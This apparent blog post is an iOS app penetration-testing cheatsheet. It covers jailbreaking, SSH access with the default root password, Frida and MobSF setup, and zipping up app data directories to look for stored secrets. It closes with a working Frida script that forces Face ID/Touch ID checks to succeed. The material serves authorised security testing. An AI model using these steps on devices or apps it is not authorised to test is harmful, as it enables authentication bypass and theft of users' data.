iOS Penetration Testing Cheatsheet: Tips and Techniques

iOS devices are becoming increasingly popular, but they’re not immune to security vulnerabilities. That’s why it’s important to know how to perform an effective iOS Penetration Test. In this blog post, I will provide you with a cheatsheet of iOS Penetration Testing tips and techniques.

---

iOS Jailbreaking:

Jailbreaking is the act of removing software restrictions imposed by Apple on its operating systems, including iOS, iPadOS, tvOS, watchOS, and bridgeOS. This allows users to gain greater control over their devices by modifying the operating system to remove limitations and enable customizations. By jailbreaking an Apple device, users can install apps and tweaks from sources other than the official App Store, giving them access to features and software that are otherwise unavailable or restricted by Apple.

In essence, jailbreaking is a way for users to bypass the limitations that Apple places on its devices and gain more freedom and control over their user experience. While this can offer benefits such as access to a wider range of apps and customization options, it’s important to consider the potential risks and drawbacks, such as security vulnerabilities and voided warranties.

1. Checkra1n (Quick Easy Method for IOS 13+)

# Visit "https://checkra.in/releases/#all-downloads" and download compatible version according to your linux system.
chmod +x filename_checkra1n
# Attached ios with linux system via USB.
./filename_checkra1n
# Click/Enter on start and follow the instruction.
# Done!!!

2. Unc0ver

# Visit "https://unc0ver.dev/" and Navigate to Installation Guide section. Download ipa file.
# Install AltServer and iCloud on OS.
# From taskbar click on AltServer icon and install on ios device.
# Navigate to "https://www.diawi.com/" and upload ipa file. Install the application.
# Open unc0ver and jail​break!

---

Access IOS via SSH:

# Install SSH Connect on IOS app
ssh [email protected]
# SSH Default Password: alpine
# Get compatible version of frida from https://github.com/frida/frida/releases
scp /root/Downloads/frida_server_ios [email protected]:/frida_server_ios
frida-ps -ai -H 192.168.0.109:6969

---

Automated tools for Static and Dynamic testing:

When it comes to testing the security of iOS applications, it can be helpful to use tools that can speed up the process of both static and dynamic testing. There are many tools available that cover a wide range of security test cases, but two of the most popular are Grapefruit and PassionFruit. Of these two, I would particularly recommend Grapefruit as it supports frida versions 14.0 and higher, while PassionFruit does not work with the latest frida versions. By using tools like these, testers can more efficiently identify potential security vulnerabilities in iOS applications.

1. Grapefruit

Link : https://github.com/ChiChou/Grapefruit

git clone --recurse-submodules https://github.com/ChiChou/Grapefruit
cd Grapefruit
npm install
npm start

2. PassionFruit

Link : https://github.com/chaitin/passionfruit

npm install -g passionfruit
passionfruit
# listening on http://localhost:31337

3. Mobile Security Framework (MobSF)

Mobile Security Framework (MobSF) is a comprehensive, automated tool that can be used for performing security assessments, malware analysis, and penetration testing of mobile applications on various platforms including Android, iOS, and Windows. It provides both static and dynamic analysis capabilities, making it a versatile tool for identifying security vulnerabilities and potential threats.

git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
./setup.sh
./run.sh

---

Manual Static Analysis:

iOS applications often store sensitive data on the client-side, making it vulnerable to attacks. There are several steps that attackers can take to retrieve this sensitive information:

1. File system analysis: By analyzing the file system of an iOS device, an attacker can locate files that contain sensitive information, such as login credentials, payment information, and personal data.
2. Jailbreaking: Jailbreaking an iOS device can provide an attacker with root access to the device, allowing them to access sensitive data that would otherwise be protected.
3. Runtime analysis: By monitoring an application during runtime, an attacker can intercept sensitive information being passed between the application and the server, such as authentication tokens or user credentials.

It is important for developers to be aware of these potential attack vectors and take steps to secure sensitive data on the client-side, such as using encryption and secure storage practices.

The Bundle directory:
Open FileZilla from IOS and visit path: /var/containers/Bundle
Now observe the file name with real name ex. myAppName B0A7E81E-6434-4FBD-9089-5C8D1CBF7717….

# from SSH of iOS
cd /var/containers/Bundle/Application/{B0A7E81E-6434-4FBD-9089-5C8D1CBF7717}
zip -R Bundle.zip .

The Data directory:
Repeat same process for name
Visit from FileZilla /var/mobile/Containers/Data/Application/

cd /var/mobile/Containers/Data/Application/7953069B-01FB-4D1D-A44B-B5757891FCE3
zip -R Data.zip 

For download the same visit : http://192.168.0.115:11111/
Download zip files and analysis sensitive information on client-side.
Below you can see common location where you can find app data.

BundlePath : /var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app
CachesDirectory : /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library/Caches
DocumentDirectory : /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Documents
LibraryDirectory : /var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693/Library

You might be also interested to look into sqlite3 files. You can retrive data from below terminal commands.

sqlite3 *.db # To enter sqlite3 database
.tables
select * from {table_name}

---

Bypass Biometric Authentication on iOS Devices:

Frida can be used to bypass biometric authentication on iOS devices by intercepting and modifying the communication between the biometric sensor and the device’s operating system.

https://gist.githubusercontent.com/r3ggi/40c252b1e96fd6664f38077c7b90dfa2/raw/9a37570b9bab1a5cb4d70d32e60e86494b7ec769/SecuBank-bypass.js

if(ObjC.available) {
    console.log("Injecting...");
    var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"];
    Interceptor.attach(hook.implementation, {
        onEnter: function(args) {
            var block = new ObjC.Block(args[4]);
            const callback = block.implementation;
            block.implementation = function (error, value)  {

                console.log("Changing the result value to true")
                const result = callback(1, null);
                return result;
            };
        },
    });
} else {
    console.log("Objective-C Runtime is not available!");
}

For additional information and resources: https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing

---